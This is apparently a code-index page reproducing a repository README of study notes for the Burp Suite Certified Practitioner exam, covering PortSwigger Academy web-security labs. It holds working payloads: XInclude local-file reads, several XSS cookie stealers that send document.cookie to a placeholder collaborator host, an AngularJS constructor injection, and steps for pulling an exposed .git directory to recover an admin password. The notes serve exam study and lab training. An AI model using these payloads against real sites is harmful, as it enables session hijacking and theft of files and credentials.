MCPcopy Index your code
hub / github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study

github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
28 symbols 157 edges 15 files 0 documented · 0% updated 3mo ago★ 1,4337 open issues
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

Burp Suite Certified Practitioner Exam Study

This is my study notes with over a 110 PortSwigger Academy Labs. I used these labs to pass the Burp Suite Certified Practitioner Exam 2023. My BSCP qualification.
For more informaion go to PortSwigger Academy to get latest learning materials.


SCANNING - Enumeration
Focus Scanning
Scan non-standard entities

FOOTHOLD - Stage 1
Content Discovery
DOM-XSS
XSS Cross Site Scripting
Web Cache Poison
Host Headers
HTTP Request Smuggling
Brute force
Authentication

PRIVILEGE ESCALATION - Stage 2
CSRF - Account Takeover
Password Reset
SQLi - SQL Injection
JWT - JSON Web Tokens
Prototype pollution
API Testing
Access Control
GraphQL API Endpoints
CORS - Cross-origin resource sharing

DATA EXFILTRATION - Stage 3
XXE - XML entities & Injections
SSRF - Server side request forgery
SSTI - Server side template injection
SSPP - Server Side Prototype Pollution
LFI - File path traversal
File Uploads
Deserialization
OS Command Injection

APPENDIX
Python Scripts
Payloads
Word lists
Focus target scanning
Approach
Extra Training Content

My Burp Tips

I can recommend doing as many as possible Mystery lab challenge to test your skills and decrease the time it takes you to identify the vulnerabilities, before taking the exam.
I also found this PortSwigger advice on Retaking your exam very informative.
Watch CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks for fresh view of the BSCP exam in 2024.


Buy Me A Coffee

Thanks for the supported coffee, \o/

My Burp Suite Certified Practitioner certificate.


Scanning

Enumeration of the Web Applications start with initial and directed scanning in time limited engagement.

Focus Scanning
Scan non-standard entities

Focus Scanning

Due to the tight time limit during engagements or exam, scan defined insertion points for specific requests.

scan-defined-insertion-points

Scanner detected XML injection vulnerability on storeId parameter and this lead to reading the secret Carlos file.

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/raw/main/file:///home/carlos/secret"/></foo>

Out of band XInclude request, need hosted DTD to read local file.

<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Discovering vulnerabilities quickly with targeted scanning

Scanning non-standard data structures

Scanning non-standard data structures using Burp feature to scan selected insertion point for select text in response or requests.

scan-selected-insertion-point

Identify the vulnerability through Burp scanner issue results.
In this case, using the identified XSS, Steal the admin user's cookies by crafting the payload in the identified insertion point.

'"><svg/onload=fetch(`//OASTIFY.COM/${encodeURIComponent(document.cookie)}`)>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

Url encode key characters.

admin-cookie-stealer

Use the admin user's cookie to access the admin panel by replacing it in the current browser session.

PortSwigger Lab: Scanning non-standard data structures


Foothold

Content Discovery

Enumeration of target start with fuzzing web directories and files. Either use the Burp engagement tools, content discovery option to find hidden paths and files or use FFUF to enumerate web directories and files. Looking at robots.txt or sitemap.xml that can reveal content.

wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Burp engagement tool, content discovery using my compiled word list burp-labs-wordlist as custom file list.

content-discovery.png

Examine the git repo branches on local downloaded copy, using git-cola tool. Then select Undo last commit and extract admin password from the diff window.

wget -r https://TARGET.web-security-academy.net/.git/

git-cola --repo 0ad900ad039b4591c0a4f91b00a600e7.web-security-academy.net/

git-cola

PortSwigger Lab: Information disclosure in version control history

Always open source code to look for any developer comments that reveal hidden files or paths. Below example lead to symphony token deserialization.

DEV code debug comment deserial


DOM-Based XSS

DOM XSS Indicators
DOM XSS Identified with DOM Invader
DOM XSS AngularJS
DOM XSS document.write in select
DOM XSS JSON.parse web messages
DOM XSS AddEventListener JavaScript URL
DOM XSS AddEventListener Ads Message
DOM XSS Eval Reflected Cookie Stealer
DOM XSS LastviewedProduct Cookie

Identify DOM-XSS

DOM-based XSS vulnerabilities arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes code to a sink that supports dynamic code execution. Test which characters enable the escaping out of the source code injection point, by using the fuzzer string below.

<>\'\"<script>{{7*7}}$(alert(1)}"-prompt(69)-"fuzzer

Review the source code to identify the sources , sinks or methods that may lead to exploit, list of samples:

  • document.write()
  • window.location
  • document.cookie
  • eval()
  • document.domain
  • WebSocket()
  • element.src
  • postMessage()
  • setRequestHeader()
  • FileReader.readAsText()
  • ExecuteSql()
  • sessionStorage.setItem()
  • document.evaluate()
  • JSON.parse
  • ng-app
  • URLSearchParams
  • replace()
  • innerHTML
  • location.search
  • addEventListener
  • sanitizeKey()

Dom Invader

Using Dom Invader plug-in and set the canary to value, such as domxss, it will detect DOM-XSS sinks that can be exploit.

DOM Invader

Vulnerable AngularJS

AngularJS expression below can be injected into the search function when angle brackets and double quotes HTML-encoded. The vulnerability is identified by noticing the search string is enclosed in an ng-app directive and /js/angular 1-7-7.js script included. Review the HTML code to identify the ng-app directive telling AngularJS that this is the root element of the AngularJS application.

domxss-on-constructor.png

PortSwigger lab payload below:

{{$on.constructor('alert(1)')()}}

Cookie stealer payload using on.constructor that can be placed in iframe, hosted on an exploit server, resulting in the victim session cookie being send to Burp Collaborator.
PortSwigger cheat sheet for cross site scripting reference

{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}

Note: The session cookie property must not have the HttpOnly secure flag set in order for XSS to succeed.

domxss-on-constructor.png

PortSwigger Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded

z3nsh3ll give an amazingly detail understanding on the constructor vulnerability in this lab on YouTube

Doc Write Location search

The target is vulnerable to DOM-XSS in the stock check function. source code reveal document.write is the sink used with location.search allowing us to add storeId query parameter with a value containing the JavaScript payload inside a <select> statement.

DOM-XSS doc write inside select

Perform a test using below payload to identify the injection into the modified GET request, using "> to escape.

/product?productId=1&storeId=fuzzer"></select>fuzzer

get-dom-xss.png

DOM XSS cookie stealer payload in a document.write sink using source location.search inside a <select> element. This can be send to victim via exploit server in <iframe>. To test the cookie stealer payload I again on my browser in console added a test POC cookie to test sending it to Collaborator.

"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//

dom-xss

PortSwigger Lab: DOM XSS in document.write sink using source location.search inside a select element

DOM XSS JSON.parse web messages

Target use web messaging and parses the message as JSON.
Exploiting the vulnerability by constructing an HTML page on the exploit server,
that exploits DOM XSS vulnerability.

Requirements to steal cookie using this method: same-origin execution and non-HttpOnly cookies

Rabbit hole: The CORS policy No Access-Control-Allow-Originheader block access for Collaborator from able to access to fetch and cookie need insecure flags, look out Neo the Matrix.

The vulnerable JavaScript code on the target using event listener that listens for a web message.
This event listener expects a string that is parsed using JSON.parse().

Identify the JSON.parse() in page code:

JSON_parse_web_messages.png

In the JavaScript below, identify the event listener expects a type property
and that the load-channel case of the switch statement changes the img src attribute.

Identify web messages on target that is using postmessage() with DOM Invader.

<script>
    window.addEventListener('message', function(e) {
        var img = document.createElement('img'), ACMEplayer = {element: img}, d;
        document.body.appendChild(img);
        try {
            d = JSON.parse(e.data);
        } catch(e) {
            return;
        }
        switch(d.type) {
            case "page-load":
                ACMEplayer.element.scrollIntoView();
                break;
            case "load-channel":
                ACMEplayer.element.src = d.url;
                break;
            case "player-height-changed":
                ACMEplayer.element.style.width = d.width + "px";
                ACMEplayer.element.style.height = d.height + "px";
                break;
            case "redirect":
                window.location.replace(d.redirectUrl);
                break;
        }
    }, false);
</script>

To exploit the abov

Core symbols most depended-on inside this repo

Shape

Function 14
Method 11
Class 3

Languages

Python100%

Modules by API surface

python/utils/site.py8 symbols
python/utils/shop.py3 symbols
python/utils/blog.py3 symbols
python/smuggle/CL.TE-smuggle-basic.py3 symbols
python/utils/utils.py2 symbols
python/access-control/access-control-x-original-url.py2 symbols
python/xss/xss1.py1 symbols
python/xss/domxss-in-jquery-hashchange.py1 symbols
python/xss/domxss-JSON.parse.py1 symbols
python/template.py1 symbols
python/ssrf/ssrf-open-redirection.py1 symbols
python/ssrf/ssrf-blacklist-filter.py1 symbols

For agents

$ claude mcp add Burp-Suite-Certified-Practitioner-Exam-Study \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact

Ask about this repo answers extend the page